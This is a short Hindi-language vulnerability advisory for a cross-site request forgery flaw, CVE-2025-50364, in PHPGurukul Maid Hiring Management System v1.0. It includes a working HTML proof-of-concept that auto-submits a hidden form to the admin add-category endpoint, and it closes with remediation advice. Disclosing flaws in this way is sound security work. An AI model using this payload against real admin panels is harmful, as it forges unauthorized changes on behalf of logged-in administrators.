
PHPGurukul Maid Hiring Management System v1.0 में CVE-2025-50364 को लक्षित करने वाला प्रमाण-की-अवधारणा CSRF शोषण जो क्राफ्टेड HTML फॉर्म के माध्यम से मनमाने व्यवस्थापक श्रेणियां जोड़ता है।
परियोजना का नाम और रेपो URL: नौकरानी किराया प्रबंधन प्रणाली PHP और MySQL का उपयोग करके
भेद्यता प्रकार: क्लाइंट साइड अनुरोध जालसाजी
प्रभावित संस्करण: v1.0
💣भेद्यता विवरण: PHPGurukul किराया प्रबंधन प्रणाली के एडमिन पैनल में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है, जो एक हमलावर को एक प्रमाणित व्यवस्थापक को दुर्भावनापूर्ण साइट पर जाने के लिए धोखा देकर मनमानी किराया श्रेणियां जोड़ने की अनुमति देती है। इससे डेटा प्रदूषण और अनधिकृत व्यवस्थापक-स्तर परिवर्तन हो सकते हैं।
👩💻प्रभाव: अनधिकृत श्रेणी निर्माण
🛜प्रमाण-अवधारणा (PoC)

/admin/add-category.php पर POST अनुरोध भेजने के लिए HTML कोड
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


सिफारिश: एडमिन फॉर्म में CSRF टोकन लागू करें, SameSite कुकीज़ लागू करें, और अनधिकृत कार्रवाइयों को रोकने के लिए अनुरोध मूल को मान्य करें।